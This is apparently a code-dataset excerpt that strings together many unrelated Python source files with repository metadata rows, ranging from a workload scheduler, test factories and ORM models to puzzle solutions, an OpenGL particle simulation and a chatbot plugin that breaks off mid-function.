if os.path.getsize(f'{clientsDir}/{n}/res/'+m) == 0 and time()-os.path.getmtime(f'{clientsDir}/{n}/res/'+m)<60:
pass
else:
resIndex = int(m[m.find('.')+1:])
if resIndex in pendingWLs:
i = pendingWLs.index(resIndex)
alList = open(f'{clientsDir}/{n}/res/{m}','r').read().split('\n\n')
alList = [i for i in alList if i!='']
alignments = []
for al in alList:
tmp = al.split('\n')
tmp = [tuple(int(k) for k in tmp[j].split(';') if tmp[j]!='')
for j in range(len(tmp))]
alignments.append(tmp)
doneWLs += 1
with open(resDir+'/'+str(resIndex),'wb') as tmp:
pickle.dump(alignments,tmp)
os.remove(f'{clientsDir}/{n}/res/{m}')
# shutil.move(f'{clientsDir}/{n}/res/{m}',f'{resDir}/{m}')
stored += 1
del(pendingWLs[i])
del(assignmentTimes[i])
else:
os.remove(f'{clientsDir}/{n}/res/{m}')
with open(f'{clientsDir}/{n}/res/done/done','wb') as doneFile:
pickle.dump(doneWLs,doneFile)
if stored > 0: print(f'{project}: \tstored {stored} alignment parts in /results')
def reopen():
reNr = 0
for i in range(len(pendingWLs)-1,-1,-1):
if time()-assignmentTimes[i] > 1800:
openWLs.insert(0,pendingWLs[i])
del(pendingWLs[i])
del(assignmentTimes[i])
reNr += 1
if reNr > 0: print(f'{project}: \treopened {reNr} timed-out workloads')
def checkDone():
if len(pendingWLs) + len(openWLs) == 0:
print(f'{project}: \tproject finished')
return True
else: return False
def backup():
with open(f'{backupDir}/openWLs','w+b') as tmp:
pickle.dump(openWLs,tmp)
with open(f'{backupDir}/pendingWLs','w+b') as tmp:
pickle.dump(pendingWLs,tmp)
with open(f'{backupDir}/assignmentTimes','w+b') as tmp:
pickle.dump(assignmentTimes,tmp)
print(f'{project}: \tcreated backup')
# load from backup
with open(f'{backupDir}/openWLs','rb') as tmp:
openWLs = pickle.load(tmp)
with open(f'{backupDir}/pendingWLs','rb') as tmp:
pendingWLs = pickle.load(tmp)
with open(f'{backupDir}/assignmentTimes','rb') as tmp:
assignmentTimes = pickle.load(tmp)
print(f'{project}: \tretrieved data from project backup (open: {len(openWLs)}; pending: {len(pendingWLs)})')
backup_counter = 0
done = False
while not done:
# 1.
for ID in os.listdir(regDir):
registerClient(ID)
os.remove(f'{regDir}/{ID}')
# 2.
passWLs()
# 3.
moveResults()
# 4.
reopen()
# 5.
if checkDone(): done = True
# 6.
if backup_counter == 100 or done:
backup()
try: htmlTool.update()
except: pass
backup_counter = 0
if done:
os.rename(projDir,f'{projDir}__done__')
backup_counter += 1
sleep(1.74)
| 36.931034 | 124 | 0.495331 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,276 | 0.353197 |
5f8a8dc4b802b22d26a8494296192bb50d7f2d9a | 2,677 | py | Python | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | test/factory/schedule_factory.py | choonho/statistics | 31fbae2d0772a2e8b717ac12c8de9edd9d8f1734 | [
"Apache-2.0"
] | null | null | null | import factory
from spaceone.core import utils
from spaceone.statistics.model.schedule_model import Schedule, Scheduled, JoinQuery, Formula, QueryOption
class ScheduledFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Scheduled
cron = '*/5 * * * *'
interval = 5
minutes = [0, 10, 20, 30, 40, 50]
hours = [0, 6, 12, 18]
class JoinQueryFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = JoinQuery
keys = ['project_id']
type = 'LEFT'
data_source_id = factory.LazyAttribute(lambda o: utils.generate_id('ds'))
resource_type = 'inventory.Server'
query = {
'aggregate': {
'group': {
'keys': [{
'key': 'project_id',
'name': 'project_id'
}],
'fields': [{
'operator': 'count',
'name': 'server_count'
}]
}
}
}
class FormulaFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Formula
name = factory.LazyAttribute(lambda o: utils.random_string())
formula = 'a + (b / c)'
class QueryOptionFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = QueryOption
data_source_id = factory.LazyAttribute(lambda o: utils.generate_id('ds'))
resource_type = 'identity.Project'
query = {
'aggregate': {
'group': {
'keys': [{
'key': 'project_id',
'name': 'project_id'
}, {
'key': 'name',
'name': 'project_name'
}, {
'key': 'project_group.name',
'name': 'project_group_name'
}],
}
},
'sort': {
'name': 'resource_count',
'desc': True
},
'page': {
'limit': 5
}
}
join = factory.List([factory.SubFactory(JoinQueryFactory)])
formulas = factory.List([factory.SubFactory(FormulaFactory)])
class ScheduleFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Schedule
schedule_id = factory.LazyAttribute(lambda o: utils.generate_id('schedule'))
topic = factory.LazyAttribute(lambda o: utils.random_string())
state = 'ENABLED'
options = factory.SubFactory(QueryOptionFactory)
schedule = factory.SubFactory(ScheduledFactory)
tags = {
'key': 'value'
}
domain_id = utils.generate_id('domain')
created_at = factory.Faker('date_time')
last_scheduled_at = None
| 26.245098 | 105 | 0.548001 | 2,508 | 0.93687 | 0 | 0 | 0 | 0 | 0 | 0 | 430 | 0.160628 |
5f9164c1cc7e9494a573895e93fd39680b8520f6 | 1,324 | py | Python | ymir/backend/src/ymir_app/app/models/iteration.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | null | null | null | ymir/backend/src/ymir_app/app/models/iteration.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | 1 | 2022-01-18T09:28:29.000Z | 2022-01-18T09:28:29.000Z | ymir/backend/src/ymir_app/app/models/iteration.py | Aryalfrat/ymir | d4617ed00ef67a77ab4e1944763f608bface4be6 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from sqlalchemy import Boolean, Column, DateTime, Integer, SmallInteger, String
from app.config import settings
from app.db.base_class import Base
from app.models.task import Task # noqa
class Iteration(Base):
__tablename__ = "iteration"
id = Column(Integer, primary_key=True, index=True, autoincrement=True)
description = Column(String(settings.STRING_LEN_LIMIT))
iteration_round = Column(Integer, index=True, nullable=False)
current_stage = Column(SmallInteger, index=True, default=0, nullable=False)
previous_iteration = Column(Integer, index=True, default=0, nullable=False)
mining_input_dataset_id = Column(Integer)
mining_output_dataset_id = Column(Integer)
label_output_dataset_id = Column(Integer)
training_input_dataset_id = Column(Integer)
training_output_model_id = Column(Integer)
testing_dataset_id = Column(Integer)
user_id = Column(Integer, index=True, nullable=False)
project_id = Column(Integer, index=True, nullable=False)
is_deleted = Column(Boolean, default=False, nullable=False)
create_datetime = Column(DateTime, default=datetime.utcnow, nullable=False)
update_datetime = Column(
DateTime,
default=datetime.utcnow,
onupdate=datetime.utcnow,
nullable=False,
)
| 36.777778 | 79 | 0.749245 | 1,101 | 0.831571 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | 0.01284 |
5f92da5358e075a34f655feb29ca353ec1f92807 | 2,833 | py | Python | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 2 | 2016-08-10T15:08:47.000Z | 2016-10-25T14:27:51.000Z | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 41 | 2016-08-04T20:19:49.000Z | 2017-03-07T20:05:53.000Z | src/jenova/components/common.py | inova-tecnologias/jenova | c975f0894b8663c6a9c9fdc7fa33590a219a6ad3 | [
"Apache-2.0"
] | 3 | 2016-09-26T19:04:51.000Z | 2017-10-26T22:13:45.000Z | import uuid, hashlib, os, yaml, logging.config, json, requests, re
from bcrypt import hashpw, gensalt
from collections import namedtuple
from sqlalchemy import create_engine
from datetime import datetime
CONFIG_FILE = os.environ.get('CONFIG_PATH_FILE')
ZimbraGrant = namedtuple(
'ZimbraGrant', [
'target_name',
'target_type',
'grantee_name',
'grantee_type',
'right',
'deny'
]
)
class CallLogger(object):
@classmethod
def logger(cls):
with open(CONFIG_FILE) as f:
logger_config = yaml.load(f)
logging.config.dictConfig(logger_config['logger'])
return logging.getLogger(os.environ.get('HOSTNAME'))
logger = CallLogger.logger()
class Config(object):
@classmethod
def load(cls):
with open(CONFIG_FILE) as f:
main_config = yaml.load(f)
return main_config
@classmethod
def gen_zimbra_grants(cls, zgrants, target_name, target_dlist, grantee_type='grp'):
"""
:param grantee_type: usr|grp|egp|all|dom|edom|gst|key|pub|email
"""
result_grants = []
for zgrant in zgrants:
result_grants.append(
ZimbraGrant(
target_name = target_name,
target_type = 'domain',
grantee_name = target_dlist,
grantee_type = grantee_type,
right = zgrant,
deny = 0
)
)
return result_grants
class InvalidCredentials(Exception):
status_code = 400
def __init__(self, message, status_code=None):
Exception.__init__(self)
self.msg = message
self.status_code = status_code
class Security(object):
def __init__(self, auth, authtoken, apikey, secretkey):
self.auth = auth
self.authtoken = authtoken
self.apikey = apikey
self.secretkey = secretkey
def is_valid_credentials(self):
if self.authtoken and self.is_valid_token():
return True
elif self.apikey and self.secretkey:
if not self.is_valid_secret_key():
raise InvalidCredentials('Wrong credentials!', 401)
else:
return False
def is_valid_token(self):
return False
def is_valid_secret_key(self):
return self.check_password(self.auth.secret_key, self.secretkey)
@classmethod
def gen_secret_key(cls, password):
plain_secretkey = hashpw(password, gensalt(log_rounds=13)).split('13$')[1]
hashed_secretkey = hashpw(plain_secretkey, gensalt(log_rounds=13))
return plain_secretkey, hashed_secretkey
@classmethod
def hash_password(cls, password):
return hashpw(password, gensalt(log_rounds=13))
@classmethod
def check_password(cls, hashed_password, user_password):
return hashpw(user_password, hashed_password) == hashed_password
@classmethod
def get_jwt_skey(self):
if os.environ.get('NODE_ENV') == 'development':
return 'changeme'
return os.environ.get('JWT_SECRET_KEY') | 26.726415 | 85 | 0.693611 | 2,382 | 0.840805 | 0 | 0 | 1,497 | 0.528415 | 0 | 0 | 282 | 0.099541 |
5f9463815346a08c07f5a3a2ec02e760f4e9de1f | 3,569 | py | Python | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | null | null | null | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | 25 | 2021-10-03T06:19:05.000Z | 2022-03-27T12:48:57.000Z | hbutils/binary/base.py | HansBug/hbutils | 6872311c8a441c5955572e0093b10189a2b90708 | [
"Apache-2.0"
] | null | null | null | import struct
from typing import BinaryIO
class CIOType:
"""
Overview:
Basic IO type.
Used as base class of all the IO types.
"""
def read(self, file: BinaryIO):
"""
Read from binary IO object.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:return: Reading result.
.. warning::
Need to be implemented.
"""
raise NotImplementedError # pragma: no cover
def write(self, file: BinaryIO, val):
"""
Write object to binary IO object.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:param val: Object to write.
.. warning::
Need to be implemented.
"""
raise NotImplementedError # pragma: no cover
class CFixedType(CIOType):
"""
Overview:
Type with fixed size (such as ``int``, ``uint`` and ``float``).
"""
def __init__(self, size: int):
"""
Constructor of :class:`CFixedType`.
:param size: Size of the type.
"""
self.__size = size
@property
def size(self) -> int:
"""
Size of the given type.
"""
return self.__size
def read(self, file: BinaryIO):
raise NotImplementedError # pragma: no cover
def write(self, file: BinaryIO, val):
raise NotImplementedError # pragma: no cover
class CRangedIntType(CFixedType):
"""
Overview:
Type with fixed size and range (such as ``int`` and ``uint``).
"""
def __init__(self, size: int, minimum: int, maximum: int):
"""
Constructor of :class:`CRangedIntType`.
:param size: Size of the type.
:param minimum: Min value of the type.
:param maximum: Max value of the type.
"""
CFixedType.__init__(self, size)
self.__size = size
self.__minimum = minimum
self.__maximum = maximum
@property
def minimum(self) -> int:
"""
Min value of the type.
"""
return self.__minimum
@property
def maximum(self) -> int:
"""
Max value of the type.
"""
return self.__maximum
def read(self, file: BinaryIO):
raise NotImplementedError # pragma: no cover
def write(self, file: BinaryIO, val):
raise NotImplementedError # pragma: no cover
class CMarkedType(CFixedType):
"""
Overview:
Type with struct mark, which can be directly read by ``struct`` module.
"""
def __init__(self, mark: str, size: int):
"""
Constructor of :class:`CMarkedType`.
:param mark: Mark of the type.
:param size: Size of the type.
"""
CFixedType.__init__(self, size)
self.__mark = mark
@property
def mark(self) -> str:
"""
Mark of the type, will be used to read from binary data with ``struct`` module.
"""
return self.__mark
def read(self, file: BinaryIO):
"""
Read from binary with ``struct`` module.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:return: Result value.
"""
r, = struct.unpack(self.mark, file.read(self.size))
return r
def write(self, file: BinaryIO, val):
"""
Write value to binary IO with ``struct`` module.
:param file: Binary file, ``io.BytesIO`` is supported as well.
:param val: Writing value.
"""
file.write(struct.pack(self.mark, float(val)))
| 24.445205 | 87 | 0.55842 | 3,515 | 0.98487 | 0 | 0 | 542 | 0.151863 | 0 | 0 | 1,963 | 0.550014 |
5f94b482c019a016c621810412b2112d18748236 | 958 | py | Python | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | 1 | 2015-03-25T22:35:52.000Z | 2015-03-25T22:35:52.000Z | Rosalind/iprb.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | # Mendel's First Law
# http://rosalind.info/problems/iprb/
import sys
import unittest
class iprb:
def main(self, hom_dom, het, hom_rec):
total = hom_dom + het + hom_rec
p_hom_dom = hom_dom / total
p_het = het / total
p_hom_rec = hom_rec / total
prob = 1
prob -= p_hom_rec * ((hom_rec-1)/(total-1))
prob -= 2 * p_hom_rec * (het / (total - 1) * 0.5)
prob -= p_het * ((het - 1) / (total-1)) * 0.25
return prob
class Test(unittest.TestCase):
def setUp(self):
self.hom_dom = 2
self.het = 2
self.hom_dom = 2
self.result = 0.78333
def test_mendel_first_law(self):
self.assertAlmostEqual(
self.result,
self.iprb().main(self.hom_dom, het, hom_rec),
places=5)
if __name__ == '__main__':
hom_dom = int(sys.argv[1])
het = int(sys.argv[2])
hom_rec = int(sys.argv[3])
if hom_dom == 0 or het == 0 or hom_rec == 0:
raise Exception("ERROR: Incorrect parameters")
result = iprb().main(hom_dom, het, hom_rec)
print(result) | 23.365854 | 51 | 0.654489 | 606 | 0.632568 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.100209 |
5f96125b242a38cf3339aa9cccbeb3af52c0c4f9 | 3,679 | py | Python | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | boltzmann.py | jkotrc/2D-Elastic-Gas | ee7632518adb03076a684dae48f0fb6f8c44efa3 | [
"Unlicense"
] | null | null | null | #MAIN method and graphics
try:
from OpenGL.GL import *
from OpenGL import GLU
import OpenGL.GL.shaders
except:
print("OpenGL wrapper for python not found")
import glfw
import numpy as np
from computation import Computation
class Graphics:
def __init__(self,width,height, computation):
if not glfw.init():
print("GLFW Failed to initialize!")
self.window = glfw.create_window(width, height, "Boltzmann", None, None);
glfw.make_context_current(self.window)
self.windowsizechanged=False
glfw.set_window_size_callback(self.window, self.resizewindow)
self.program = self.loadShaders("vertex.glsl", "fragment.glsl")
glUseProgram(self.program)
glUniform1i(glGetUniformLocation(self.program, "WIDTH"), width)
glUniform1i(glGetUniformLocation(self.program, "HEIGHT"), height)
self.width=width
self.height=height
self.comp = comp
self.points = np.array(self.comp.pos.reshape(-1,order='F'), dtype=np.float32)
self.graphicsinit()
def resizewindow(self,w,h,a):
self.windowsizechanged=True
def graphicsinit(self):
VBO = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, VBO)
glBufferData(GL_ARRAY_BUFFER, self.points.itemsize * self.points.size, self.points, GL_STATIC_DRAW)
position = glGetAttribLocation(self.program, "position")
glVertexAttribPointer(position, 2, GL_FLOAT, GL_FALSE, 0, None)
glEnableVertexAttribArray(position)
glClearColor(0.3, 0.3, 0.3, 1.0)
glEnable(GL_POINT_SMOOTH)
glPointSize(self.comp.size/2)
def render(self):
for i in range (0, self.comp.frameskip):
self.comp.cudastep();
self.points = self.comp.pos.reshape(-1,order='F')
glClear(GL_COLOR_BUFFER_BIT)
glUseProgram(self.program)
glBufferData(GL_ARRAY_BUFFER, self.points.itemsize * self.points.size, self.points, GL_STATIC_DRAW)
glDrawArrays(GL_POINTS, 0, int(self.points.size / 2))
glfw.swap_buffers(self.window)
def mainloop(self):
while not glfw.window_should_close(self.window):
glfw.poll_events()
if self.windowsizechanged == True:
self.width,self.height = glfw.get_framebuffer_size(self.window);
glUseProgram(self.program)
glUniform1i(glGetUniformLocation(self.program, "WIDTH"), self.width)
glUniform1i(glGetUniformLocation(self.program, "HEIGHT"), self.height)
self.windowsizechanged=False
self.render()
glfw.terminate()
def loadShaders(self, vertpath, fragpath):
vertexshader=glCreateShader(GL_VERTEX_SHADER)
fragmentshader=glCreateShader(GL_FRAGMENT_SHADER)
fragfile = open(fragpath, "r")
vertfile = open(vertpath, "r")
fragsource = fragfile.read()
fragfile.close()
vertsource = vertfile.read()
vertfile.close()
shader = OpenGL.GL.shaders.compileProgram(OpenGL.GL.shaders.compileShader(vertsource, GL_VERTEX_SHADER),
OpenGL.GL.shaders.compileShader(fragsource, GL_FRAGMENT_SHADER))
return shader
if __name__ == "__main__":
#A good configuration: 80x80 balls, space 24, width=height=1000, size=8, speedrange=20, frameskip=3, epsilon=0.01, blocksize=512
comp=Computation(width=1000, height=1000, space=20, xballs=100, yballs=100, speedrange=20,size=4,frameskip=1,epsilon=0.01,blocksize=512)
g=Graphics(1000, 1000,comp)
g.mainloop(); | 44.325301 | 141 | 0.651264 | 3,070 | 0.834466 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.087252 |
5f972ab5ab25213d75c3f56834078dbd2a9d9668 | 706 | py | Python | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | 3 | 2020-12-09T11:36:31.000Z | 2020-12-11T01:41:52.000Z | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | null | null | null | python/src/day06.py | azuline/aoc2020 | 849b48adf3a67ac0eeb485818e38a4b3a72fc03a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from itertools import chain
from pathlib import Path
from typing import List
INPUT_FILE = Path.cwd().parent / "inputs" / "day06.txt"
AnswerGroup = List[str]
def transform_input(input: str) -> List[AnswerGroup]:
return [x.split("\n") for x in input.strip().split("\n\n")]
def part1(groups: List[AnswerGroup]) -> int:
return sum(len(set(chain(*x))) for x in groups)
def part2(groups: List[AnswerGroup]) -> int:
return sum(len(set.intersection(*[set(y) for y in x])) for x in groups)
if __name__ == "__main__":
with INPUT_FILE.open("r") as f:
input = transform_input(f.read())
print(f"Part 1: {part1(input)}")
print(f"Part 2: {part2(input)}")
| 23.533333 | 75 | 0.660057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 113 | 0.160057 |
5f979d09341797e001c31791e45f05729f30d0c6 | 933 | py | Python | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | symopt/objective.py | spcornelius/symopt | 6f276ca07cc266af1cd58758a0cf413ab85f2591 | [
"MIT"
] | null | null | null | from symopt.base import SymOptExpr
import sympy as sym
class ObjectiveFunction(SymOptExpr):
""" Symbolic (non)linear optimization objective function. """
def __init__(self, obj, prob, **kwargs):
""" Symbolic (non)linear optimization objective function.
Parameters
----------
obj : `~sympy.core.expr.Expr`
Symbolic expression representing the objective function,
in terms of :py:attr:`prob.vars` and :py:attr:`prob.params`.
prob : `.OptimizationProblem`
The containing optimization problem.
**kwargs
Keyword args to pass to `.SymOptBase`.
"""
self.obj = sym.sympify(obj)
super().__init__(prob, **kwargs)
@property
def expr(self):
return self.obj
@property
def sympified(self):
return self.obj
def __repr__(self):
return f"ObjectiveFunction('{self.obj}')"
| 27.441176 | 72 | 0.608789 | 875 | 0.937835 | 0 | 0 | 111 | 0.118971 | 0 | 0 | 538 | 0.576635 |
5f97f0b8c3e75f1f6f491e876381487088f22f49 | 771 | py | Python | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | 4 | 2017-01-25T05:25:52.000Z | 2021-02-18T08:48:51.000Z | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | null | null | null | batch_run.py | hrishioa/Oyente | 76c8943426727c93ab161a4e196dc6abdf636fe2 | [
"MIT"
] | 1 | 2018-08-09T20:57:31.000Z | 2018-08-09T20:57:31.000Z | import json
import glob
from tqdm import tqdm
import os
contract_dir = 'contract_data'
cfiles = glob.glob(contract_dir+'/contract*.json')
cjson = {}
print "Loading contracts..."
for cfile in tqdm(cfiles):
cjson.update(json.loads(open(cfile).read()))
results = {}
missed = []
print "Running analysis..."
for c in tqdm(cjson):
with open('tmp.evm','w') as of:
# print "Out: "+cjson[c][1][2:]
of.write(cjson[c][1][2:]+"\0")
os.system('python oyente.py tmp.evm -j -b')
try:
results[c] = json.loads(open('tmp.evm.json').read())
except:
missed.append(c)
print "Writing results..."
with open('results.json', 'w') as of:
of.write(json.dumps(results,indent=1))
with open('missed.json', 'w') as of:
of.write(json.dumps(missed,indent=1))
print "Completed." | 19.769231 | 54 | 0.66537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 233 | 0.302205 |
5f981f7b480688c0f261ed48cbccc55b236c176c | 2,266 | py | Python | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 1 | 2020-07-01T14:40:10.000Z | 2020-07-01T14:40:10.000Z | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 9 | 2020-02-07T11:58:51.000Z | 2021-09-07T16:23:38.000Z | tests/test_statistics.py | BENR0/textory | 0f81b8b6726298b9181be27da7aaac2dd25bd763 | [
"MIT"
] | 1 | 2019-11-20T05:53:13.000Z | 2019-11-20T05:53:13.000Z | #! /usr/bin/python
# -*- coding: utf-8 -*-
import pytest
import numpy as np
from textory.util import neighbour_diff_squared, num_neighbours, neighbour_count, create_kernel
from textory.statistics import variogram, pseudo_cross_variogram
@pytest.fixture
def init_np_arrays():
"""Inits two random np arrays"""
np.random.seed(42)
n = 50
a1 = np.random.random((n,n)) * 157
a2 = np.random.random((n,n)) * 237
return a1.astype(np.float32), a2.astype(np.float32)
def test_variogram(init_np_arrays):
"""THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES
This test needs improvement in calculation and what is tested.
Much code is shared with the "neighbour_diff_squared" test in test_util.
"""
a, _ = init_np_arrays
tmp = np.zeros_like(a)
lag = 1
lags = range(-lag, lag + 1)
rows, cols = a.shape
#calculate variogram difference
for i in range(0, cols):
for j in range(0, rows):
for l in lags:
for k in lags:
if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)):
continue
else:
tmp[i,j] += np.square((a[i, j] - a[i+l, j+k]))
tmp = np.nansum(tmp)
res = tmp / 40000
assert variogram(a, lag=1) == res
def test_pseudo_cross_variogram(init_np_arrays):
"""THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES
This test needs improvement in calculation and what is tested.
Much code is shared with the "neighbour_diff_squared" test in test_util.
"""
a, b = init_np_arrays
tmp = np.zeros_like(a)
lag = 1
lags = range(-lag, lag + 1)
rows, cols = a.shape
#calculate variogram difference
for i in range(0, cols):
for j in range(0, rows):
for l in lags:
for k in lags:
if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)):
continue
else:
tmp[i,j] += np.square((a[i, j] - b[i+l, j+k]))
tmp = np.nansum(tmp)
res = tmp / 40000
assert pseudo_cross_variogram(a, b, lag=1) == res
| 27.634146 | 101 | 0.566637 | 0 | 0 | 0 | 0 | 245 | 0.10812 | 0 | 0 | 595 | 0.262577 |
5f9861c2730925ff3619b6059676dc2a261cbae6 | 827 | py | Python | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 9 | 2020-08-12T10:01:00.000Z | 2022-01-05T04:37:48.000Z | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 1 | 2021-02-16T10:19:31.000Z | 2021-02-16T10:19:31.000Z | question_bank/lemonade-change/lemonade-change.py | yatengLG/leetcode-python | 5d48aecb578c86d69835368fad3d9cc21961c226 | [
"Apache-2.0"
] | 4 | 2020-08-12T10:13:31.000Z | 2021-11-05T01:26:58.000Z | # -*- coding: utf-8 -*-
# @Author : LG
"""
执行用时:152 ms, 在所有 Python3 提交中击败了96.83% 的用户
内存消耗:14 MB, 在所有 Python3 提交中击败了12.45% 的用户
解题思路:
见代码注释
"""
class Solution:
def lemonadeChange(self, bills: List[int]) -> bool:
five = ten = 0 # 5元10元初始各0个
for bill in bills:
if bill == 20: # 对于20,有两种找零方式
if five > 0 and ten > 0: # 一张5一张10
five -= 1
ten -= 1
elif five > 2: # 或者 三张5
five -= 3
else: # 其余情况找不开
return False
elif bill == 10 and five > 0: # 对于10, 只能找零一张5
five -= 1
ten += 1
elif bill == 5: # 5元不用找零
five += 1
else:
return False
return True | 27.566667 | 59 | 0.41717 | 768 | 0.764179 | 0 | 0 | 0 | 0 | 0 | 0 | 398 | 0.39602 |
5f98d7e1817b744273f69d626fee4ccb8dd5c371 | 319 | py | Python | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | 1 | 2021-06-25T15:29:11.000Z | 2021-06-25T15:29:11.000Z | pythonProject/MUNDO 2/Desafio 57.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | #Leia o sexo de uma pessoa, só aceite as letras M ou F; Caso contrario, peça a digitação novamente
sexo= str(input('Digite seu sexo [M/F]: ')).strip().upper()[0]
while sexo not in 'MF':
sexo=str(input('DIGITE O SEXO [M/F]: ')).strip().upper()[0]
print('seu sexo é {} e está registrado com sucesso!'.format(sexo)) | 39.875 | 98 | 0.670846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 202 | 0.621538 |
5f993e929da96965b346f667b7d028433a1f27c0 | 2,157 | py | Python | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | from nonebot.adapters.onebot.v11.event import MessageEvent
from nonebot.typing import T_State
from nonebot.adapters.onebot.v11 import Bot, Message
from plugins.uma.plugins.uma_whois.data_source import UmaWhois
from plugins.uma import chara
#matcher =on_endswith({'是谁','是谁?','是谁?'},priority=5)
matcher =UmaWhois().on_regex(r'^(.*)是谁([?? ])?',"whois")
@matcher.handle()
async def whois(bot: Bot, event: MessageEvent,state: T_State):
name = event.message.extract_plain_text().strip()
name = name.split("是", 1)[0]
print(name)
if not name:
return
id_ = chara.name2id(name)
confi = 100
guess = False
if id_ == chara.UNKNOWN:
id_, guess_name, confi = chara.guess_id(name)
guess = True
c = chara.fromid(id_)
if confi < 60:
return
if guess:
name = name
msg = f'特雷森似乎没有叫"{name}"的人...\n角色别称补全计划:https://github.com/chieri-bot/umamusume-alias'
await matcher.send(Message(msg))
msg = f'您有{confi}%的可能在找{guess_name} {c.icon} {c.name}'
await matcher.send(Message(msg))
else:
msg = f'{c.name}{c.icon}'
await matcher.send(Message(msg), at_sender=True)
#matcher =on_startswith('谁是',priority=5)
matcher =UmaWhois().on_regex(r'^谁是(.*)([?? ])?',"whois")
@matcher.handle()
async def whois(bot: Bot, event: MessageEvent,state: T_State):
name = event.message.extract_plain_text().strip()
name = name.split("是", 1)[1]
name = name.split("?", 1)[0]
name = name.split("?", 1)[0]
print(name)
if not name:
return
id_ = chara.name2id(name)
confi = 100
guess = False
if id_ == chara.UNKNOWN:
id_, guess_name, confi = chara.guess_id(name)
guess = True
c = chara.fromid(id_)
if confi < 60:
return
if guess:
name = name
